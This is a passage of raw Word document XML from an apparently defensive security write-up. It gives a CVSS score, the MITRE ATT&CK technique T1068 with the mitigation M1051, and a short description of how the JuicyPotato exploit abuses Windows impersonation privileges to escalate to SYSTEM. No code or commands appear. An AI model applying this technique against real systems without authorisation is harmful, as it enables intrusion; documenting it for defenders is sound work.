                <w:smallCap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84E273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1B43D0C9"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2D0D792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D276FA5" w14:textId="68AF244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6F64D54" w:rsidP="0D325B6E" w:rsidRDefault="76F64D54" w14:paraId="719D262A" w14:textId="3C523143">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="Rf216a722c5d04747">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AC:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AT:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>PR:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>UI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VC:</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r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</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r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</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r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:</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r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SI:</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r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="76F64D54">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5DE6C55E">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3520916" w14:textId="7654BA4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CEA8B6E" w:rsidP="0D325B6E" w:rsidRDefault="5CEA8B6E" w14:paraId="7C49ED77" w14:textId="4B830B7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5CEA8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A4D562" w:rsidP="0D325B6E" w:rsidRDefault="6CA4D562" w14:paraId="7113C29D" w14:textId="37FA244E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0cb36c37bc424764">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6CA4D562">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1068</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="78CC579A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6CA4D562">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="013F22C0">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E75460D"/>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E68EF18" w:rsidP="0D325B6E" w:rsidRDefault="6E68EF18" w14:paraId="259AFCE9" w14:textId="6DACA99A">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6E68EF18">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513E491" w:rsidP="0D325B6E" w:rsidRDefault="5513E491" w14:paraId="694F4138" w14:textId="5364DA49">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ref860ed2e26a420d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5513E491">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="089F322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1CF904" w14:textId="1C7C06DA">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F7AF942" w14:textId="01B80E3A">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7B64FF7A" w14:textId="58DC821A"/>
    <w:p w:rsidR="46EC6142" w:rsidP="0D325B6E" w:rsidRDefault="46EC6142" w14:paraId="1F65BA27" w14:textId="085D232E">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8982725" w:rsidP="0D325B6E" w:rsidRDefault="08982725" w14:paraId="23675993" w14:textId="744D10E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="08982725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JuicyPotato</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="08982725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Windows privilege escalation exploit that abuses the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1803D51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803D512">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1803D512">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1803D512">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeAssignPrimaryToken</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00E73482">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” privileges to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7944C323">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">escalate from a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7944C323">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>local service account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7944C323">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to System. The exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5950CE95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impersonates</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7944C323">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="252296A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component Object Models (COM)</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DE860A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create new processes </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4CB21F24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="768801F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assign</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4CB21F24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> its token to have</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DE860A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DE860A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DE860A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6178674C" w14:textId="0BF1FB72">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6EC6142" w:rsidP="0D325B6E" w:rsidRDefault="46EC6142" w14:paraId="26362675" w14:textId="67934630">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65616A0" w:rsidP="0D325B6E" w:rsidRDefault="165616A0" w14:paraId="0349CE22" w14:textId="1785CFF9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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616A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E3D496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0F561FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="165616A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="165616A0">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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E3D4960">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to elevate t</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7F0F2A79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
